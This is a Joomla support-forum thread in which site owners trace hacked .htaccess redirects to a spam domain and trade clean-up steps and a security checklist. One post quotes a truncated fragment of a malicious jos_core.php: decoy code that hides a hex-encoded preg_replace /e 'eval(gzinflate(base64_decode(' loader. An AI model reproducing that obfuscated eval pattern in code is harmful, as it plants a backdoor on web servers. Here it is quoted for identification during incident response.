The Joomla! Forum ™

Hi,

Just wondering if anyone has any info on the issue I had with my website.

I believe my .htaccess was hacked some how, this redirected every Search Engine Friendly URL on my site to http://<spam>.ru/way/cream.php *I don't know how safe that url is, but I have looked at the source an there doesn't appear to be anything malicious in it*

the alter .htaccess looked like this:



To fix the redirects I just replaced the .htaccess with a previous backup, disabled all Search Engine Friendly URLs and disabled mod_rewrite.

Can anyone provide info on how or what happened, an if there maybe any other alter server side files or database injections? Seems very odd - are there any prevention measures I can take to stop this from happening again, I plan to upgrade to Joomla 2.5 it is currently 1.5.

Edulex .com appears to have the same thing happening to their website.

data from WHOIS.REGISTRY.TCINET.RU:


domain: <spam>.RU
nserver: ns1.reg.ru.
nserver: ns2.reg.ru.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2012.03.13
paid-till: 2013.03.13
free-date: 2013.04.13
source: TCI

Last updated on 2012.03.23 02:18:42 MSK

Cheers

You need to run the Forum Post Assistant then save your configuration.php file then delete all the folders/files. Check your computer for malware ... and everything else on the list on viewtopic.php?f=432&t=475313

_________________
http://weblinksonline.co.uk/joomla-faq.html

I have had what I think is exactly the same problem today...

We're fighting the same problem here. Two different sites, built by two different people, two seemingly different problems, until we compared the "forward to" site. Only thing in common between the sites is that both operate out of the same 1and1 account.

But here's where it gets interesting. We fixed one by eliminating the .htaccess files - thanks for that tip. The other site does not contain a single .htaccess file. And I also downloaded and searched EVERY FILE on the website for "hand-poise". Nothing found. But it keeps forwarding.

Then we discovered that the directory root, to which no joomla site has access, had a hacked .htaccess file. How is that possible unless someone hacked either the ftp access (which uses long random passwords), or something on the 1and1 end of things... So out of curiosity, are you a 1and1 customer?

We've now deleted that file, and checked again - nowhere is there an .htaccess file, but still the problem persists...

Both sites: Joomla 1.7.3.

Any help or clues from anyone would be much appreciated...

P.S. To the moderators. I understand the need to kill off links, but in this case, you might want to leave at least one. I had no idea what happened to me, no clue that I'd been hacked through .htaccess or my SEF URLs. I was lucky to find this thread, and its answers, by searching for the evil website name. Now that name is gone. I'm guessing a lot of others will be searching for the same thing I did. Just sayin...

<spam link removed>

No you cut the wires to the fire alarm.

The OP (who's thread you are hijacking) said nothing about the .htaccess being in the server root.


Of course the problem persists because you done the equivalent of cutting the wires to the fire alarm instead of putting out the fire.

You should have updated.


In addition to all of that you have not yet run the Forum Post Assistant. Please use that tool and post the results.

_________________
http://weblinksonline.co.uk/joomla-faq.html

Hey controlguy,

I'd suggest removing both sites and databases and uploading a stable backup of each.

Then update joomla to the latest stable build with joomla admin tools, I'd also change all passwords for you joomla site and database.

It appears whatever this is it affects the database and restores the .htaccess to the altered redirect.

Webdongle - sorry It would be pointless to run this tool now as I have already restored my sites and updated to a stable joomla build so the error no longer exists.

Whatever hack this is it is very malicious and you need to fix this immediately as it points the site to [URL Removed] with extension [Extension Removed]
which appears to be a virus. I've also seen it point a url to [URL removed], which has a fake windows anti-virus downloader.

cheers

If your PC is infected then you will get hacked again. Databases are rarely hacked. You need to update your extensions as well.

Admin tools is not Joomla but it is a good way to update Joomla.


There is every need to run the Forum Post Assistant, it will show a lot of things that you may have missed. Like chmod folders and files 777 because you can't install extensions. And many other things.

_________________
http://weblinksonline.co.uk/joomla-faq.html

ok i'll run it thanks.

i will leave the discussion on hijacking etc to webdongle. who quite rightly has suggested the fact to start your own topic or follow this one or read http://docs.joomla.org/Security_Checklist_7

we do that to prevent those who might be inexperienced in the ways of the world clicking links, and to prevent spam link juice in flyby night malicious code sites.

As webdongle said, and should possibly imply harder, each site is unique and therefore we prefer to have each user making their own post. telling us about your site and its life story distracts from helping the OP and then helping others.
you could easily have found this topic by searching for things like 301 redirect etc

perhaps, but tomorrow it will have a different name, and you reposting it after it had been removed shows a near blatent disregard for both policy and netiquette. i will say once, please do not do it again.
if you want to tag it with something, why not use 301 redirect, htaccess hacked.

just telling.
<spam link removed>

Now for educational purposes, if someone has accessed your site to the point they can view/edit your htaccess file, then they can go anywhere and do whatever they want accross your account and possibly others.
what has your host said?

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}

yep... just checked its the .htaccess file that has all the redirects to the spam site.

changed the .htaccess file and you cannot access the homepage... so whatever it is, it runs deeper into joomla.

started my own thread here http://forum.joomla.org/viewtopic.php?f=432&t=705216 but will certainly continue to monitor this thread as well.

Now for educational purposes, if someone has accessed your site to the point they can view/edit your htaccess file, then they can go anywhere and do whatever they want accross your account and possibly others.
what has your host said?[/quote]

I could not get a meaningful response from my host. I have a shared hosting account with 15 affected domains. I have gone through the checklist twice and the new htaccess codes are appearing at the same time across multiple domains. On clean installs.

which points to 3 options
1.cron job replacing htaccess
2. serverwide hacked (host is not just you)
3. your computer is infected see viewtopic.php?f=432&t=411735

can people follow http://docs.joomla.org/Security_Checklist_7 and post their host name (not the registrar!)

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}

1. I have no cron jobs
2. Checked my PC with 2 programs, appears clean.
3. Any suggestions in regard to item #2?

Godaddy Shared Hosting.

im streamline.net shared hosting...

The same problem. Some script generates .htaccess files in the user root directory with redirecting to other domen.

I have disabled all my sites to stop visitors from getting hit by this virus landing page.

I believe a possible issue is that I did not have the latest stable version of Joomla on all of my websites, it may possibly be a component/plugin vulnerability.

I've spoken to my hosting tech support multiple times to no avail.

I currently have tech support analyzing my entire hosting server, will keep you posted if they find anything.

I plan to archive restore my entire web server back to a previous stable date, then download everything onto a local machine. I will then update Joomla to latest versions and remove any suspicious plugins in a local environment, I will be disconnected from the internet for precaution. All passwords including database will be changed.

My PC virus scanner returned a clean bill of health.

One thing that has worked for me is restoring or replacing every .htacces file on the server to one not infected with:



Then changing the file permission to 444 as soon as it has been uploaded on the server, this should stop the file from being re-written and effectively stopping the redirect to the malicious website. I have also tried setting the .htacces file permission to 000 which returns a 403 forbidden on all my websites, this is better than having your visitors landing on a virus website.

This is not a fix to the problem as the issue still exists, but it will help prevent your visitors from getting hit with a virus and give you a little breathing room to rectify the problem - ie restore a backup, update joomla, remove or update all components/mods and plugins.

We have analyzed the logs and found jos_core.php file in the tmp folder, treatment of which coincide in time with the creation of the .htaccess files. I think this is a malicious script.

I can not find a file called jos_core.php or a folder called tpm on my webserver.
Can you provide the url structure to the tpm folder?

ie:- /administrator/cache/tpm

No, just /tmp folder in your site root. You can try to find some of the text below:



// ####################### SET PHP ENVIRONMENT ###########################

// #################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'register');
define('CSRF_PROTECTION', true);
define('CONTENT_PAGE', false);

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array('timezone', 'user', 'register', 'cprofilefield');

// get special data templates from the datastore
$specialtemplates = array(
'smiliecache',
'bbcodecache',
'banemail',
'ranks',
);

// pre-cache templates used by all actions
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28' ..........

Hi, everybody. First, sorry for my english. I'm not a joomla expert but I'm trying to fix this problem in my site. I see many .htaccess in several folder. What do you thing about download my site, open it locally, run a search and remove all the .htaccess inside and then re-upload again? If it reappers, what could generate these files? Thanks for your advice

ggreen - i havent seen a file like that since vbulletin days!
but yes , that is your shell script (backdoor entrance) but not how they got the file there in the first place
see viewtopic.php?f=432&t=705216&p=2772517#p2772517

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}

I found jos_core.php in a tmp folder, it looks like it was installed the same day as Sourcerer-v2.11.0.zip.

Do you guys have Sourcerer-v2.11.0 installed?

You found that nearly 24 hours after you were advised to delete all the folders/files on your server. Obviously you are not taking the advice given. Also the version of Sourcerer is old and listed in the VEL with a link to the latest version. You obviously ignored that advice as well.

Because you are not following advice then I will not waste my time giving it.

@the rest who are hijacking this thread
Create your own threads if you want your problems answered.

_________________
http://weblinksonline.co.uk/joomla-faq.html

hosting tech support advised me not to delete any files as they are analyzing the hosting server, I tend to listen to the people who are actively analyzing my server. I've taken the websites offline, and also attained the restored backup files.

I'm telling people that Sourcerer-v2.11.0 may have been the issue so that they can pin point the problem, the site I had Sourcerer-v2.11.0 was on a testing environment that I have not used for sometime, hence why I hadn't updated.

I have already re-created a restored web server with all sites working fine, Webdongle I'm offering this information to help other people with the same problem.

Ah, misreadIt looked like it was not Hosting tech support but some other tech support analysing the server. Who is your Host ?

_________________
http://weblinksonline.co.uk/joomla-faq.html

OK I did this to solve the problem (permanently, I hope),

0. Run a full backup
1. I got a healthy .htaccess (previous backup) and I replace the infected one.
2. In my cpanel, I run a seach to locate all the .htaccess in my folders
3. Using filezilla, I delete all the .htaccess with the same size and date of the infected one.
4. Also I erase jos_core.php (just in case, is suspicios)
5. Then, I try again with Google Chrome and redirection disappers.

By now, it works. I'm aware in case that you, guys, discover the hole or the script that cause this

@oscarguzval

You are hijacking someone else's thread and with incorrect information. You said you replaced some files. Unless you delete all the folders/files on the server then the infection is still on the server. You have not solved your problem.

_________________
http://weblinksonline.co.uk/joomla-faq.html

I'm not an expert like you but I just share the course of action that works for me and my site. I really appreciate if you share with me what is wrong with this procedure (still working) and what is the best way to solve it. (Sorry, english is not my native language so, I appreciate a lot if you can write your answer with plain words)

Thanks, you

Greetings from Colombia

But that is the point it will not always get rid of the infection.


I already have ... you need to delete all folders/files on the server. And had you read the 'Please read before you Post (sticky) you would know what else needs to be done to ensure you site is not reinfected.

_________________
http://weblinksonline.co.uk/joomla-faq.html

Regardless of if your host said not to delete the files or not you should follow the points below in order to properly repair your site and help prevent it from happening again. You can always coordinate the effort with your hosts request, but if they wanted the files they could have or can easily copy them to a different server made for that purpose in less than 5 minutes.

It would help us to help you if before you post your security/been hacked topic

You must state what version of 1.5 you are using.

Tell us if you have done the following, try copy and paste to use as a posting guide if needed

[ ] Did you use the forum http://forum.joomla.org/search.php search box for a similar error?

[ ] Run the Forum Post Assistant / FPA Instructions available here and are also included in the download package.

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file. Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory), and fresh copies of extensions and templates used. Upload the copy of your configuration file. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories More detail can be found in the security Checklist 7 link below.

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist 7 to make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled

Note: The forum post tool will work with 1.0.x, J1.6.x, J1.7.x, 2.5.x versions of Joomla.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator